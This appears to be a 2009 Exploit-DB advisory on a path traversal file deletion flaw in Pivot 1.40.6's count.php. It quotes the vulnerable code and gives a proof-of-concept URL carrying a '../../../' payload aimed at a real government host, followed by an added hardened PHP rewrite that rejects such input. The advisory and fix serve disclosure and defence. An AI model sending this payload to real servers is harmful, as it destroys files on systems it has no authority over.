Vendor: Pivot
By: Alfons Luja
CVSS: 7.5 (HIGH)
Title: Remote File Delete
CWE: 20
Product Name: Pivot
Affected Version From: 1.40.6
Affected Version To: 1.40.6
Patch Exists: NO
Related CWE: N/A
CPE: a:pivot:pivot:1.40.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Pivot 1.40.6 Remote File Delete

A vulnerability exists in Pivot 1.40.6 which allows an attacker to delete files remotely. The cause is that the $bbclone_debug variable is never changed and is always set to false, so the 'refkey' parameter of the 'count.php' script, which is used unvalidated in a file path, ends up being passed to unlink(). If register_globals is ON, an attacker can also use this bug to include a file.

Mitigation:

Disable register_globals and ensure that the $bbclone_debug variable is set to true.

Exploit-DB raw data:

Pivot 1.40.6 Remote File Delete

Alfons Luja

Vuln:
     
     extensions/bbclone_tools/hr_conf.php line 20

       ...
 
       $bbclone_debug = false;  // is never changed

       ...
 
=========================================================
       
    extensions/bbclone_tools/count.php


      ...


      if ( ($_GET["refkey"]!="") && file_exists("$refkeydir/".$_GET["refkey"])) {   [1]

	if ($bbclone_debug==true) { echo "Refkey found..<br />"; }

	// Getting the time offset between the web and file server (if there is any)
	$offset = timediffwebfile($bbclone_debug);

	if ((time() - filectime("$refkeydir/".$_GET["refkey"])) < (1000+$offset)) {   [2]
         
		include("do_count.php");
		if ($bbclone_debug!=true) {
			header("content-type:image/gif");
			readfile("pixel.gif");
		} else {
			echo "Counted normally";
		}
		die();

	} else if ($bbclone_debug==true) {
		echo "too old!";
	}

	if ($bbclone_debug!=true) {                                                    [3]
		unlink("$refkeydir/".$_GET["refkey"]);
	}
}

      ...


[1] Any existing file can be supplied as 'refkey'.

[2] Time dependence:
     If current time - last modification time < 1000 + $offset (usually 1001 or 1002, not more),
     we must wait a moment, otherwise the exploit does not work.

[3] $bbclone_debug is always false, so when the condition from point [2] is false,
     we can delete the supplied file.


If register_globals is ON, this bug can also be used to include a file.

PoC:

http://www.pentagon.gov/~pivot_1406_full/extensions/bbclone_tools/count.php?refkey=../../../extensions/bbclone_tools/hr_conf.php
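For comparison, the following is an added example of how the count.php refkey handling shown above can be hardened; it is not Pivot's or BBClone's code and is not part of the advisory. It keeps the original control flow of points [1] to [3] but only ever touches a file that has been validated as a plain token naming a regular file directly inside $refkeydir, and it no longer makes the unlink() depend on $bbclone_debug. The helper names safe_refkey_path() and handle_refkey() are hypothetical, and $refkeydir is assumed to be defined in hr_conf.php as in the original.

```php
<?php
// Added example, not BBClone/Pivot code. Hardened replacement for the
// refkey handling in extensions/bbclone_tools/count.php (hypothetical names).

/**
 * Map an untrusted 'refkey' parameter to a file path, or return null.
 * Only a short plain token that resolves to a regular file directly inside
 * $refkeydir is accepted, so "../" sequences, absolute paths and symlinks
 * pointing out of the directory are rejected before anything is unlinked.
 */
function safe_refkey_path(string $refkeydir, string $refkey): ?string
{
    if ($refkey === '.' || $refkey === '..'
        || !preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $refkey)) {
        return null;
    }
    $base = realpath($refkeydir);
    $full = realpath($refkeydir . DIRECTORY_SEPARATOR . $refkey);
    if ($base === false || $full === false) {
        return null;
    }
    // realpath() has resolved symlinks and '..'; the result must still be a
    // regular file whose parent directory is exactly the refkey directory.
    if (dirname($full) !== $base || !is_file($full)) {
        return null;
    }
    return $full;
}

/**
 * Same decision sequence as the original [1]-[3], applied to a validated
 * path. Returns 'rejected', 'counted' or 'expired' instead of echoing and
 * calling die(), so it can be exercised outside a web request.
 */
function handle_refkey(string $refkeydir, string $refkey, int $offset = 0): string
{
    $path = safe_refkey_path($refkeydir, $refkey);
    if ($path === null) {
        return 'rejected';   // nothing on disk is read or removed
    }
    if ((time() - filectime($path)) < (1000 + $offset)) {
        // This is where count.php would include do_count.php and send pixel.gif.
        return 'counted';
    }
    // A stale refkey is a one-shot token and removing it is intended, but
    // the removal is unconditional and limited to files that passed validation.
    unlink($path);
    return 'expired';
}

// Stand-alone demo using a constructed refkey directory in the temp folder.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/refkey_demo_' . getmypid();
    mkdir($dir, 0700);
    file_put_contents("$dir/abc123", '');   // a freshly written refkey

    $cases = [
        'abc123',                                         // legitimate, fresh
        '../../../extensions/bbclone_tools/hr_conf.php',  // traversal string from the PoC
        '/etc/hostname',                                  // absolute path
        'missing',                                        // no such refkey
    ];
    foreach ($cases as $key) {
        printf("%-50s => %s\n", $key, handle_refkey($dir, $key));
    }
    // Expected: counted, rejected, rejected, rejected

    unlink("$dir/abc123");
    rmdir($dir);
}
```

Run it with `php count_hardened.php` (any file name works). The path check alone does not address the second issue in the advisory: with register_globals enabled, $refkeydir and $bbclone_debug themselves can be overwritten from the request, so the directive has to be turned off in php.ini as well (it was removed from PHP entirely in 5.4.0).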

# milw0rm.com [2009-03-18]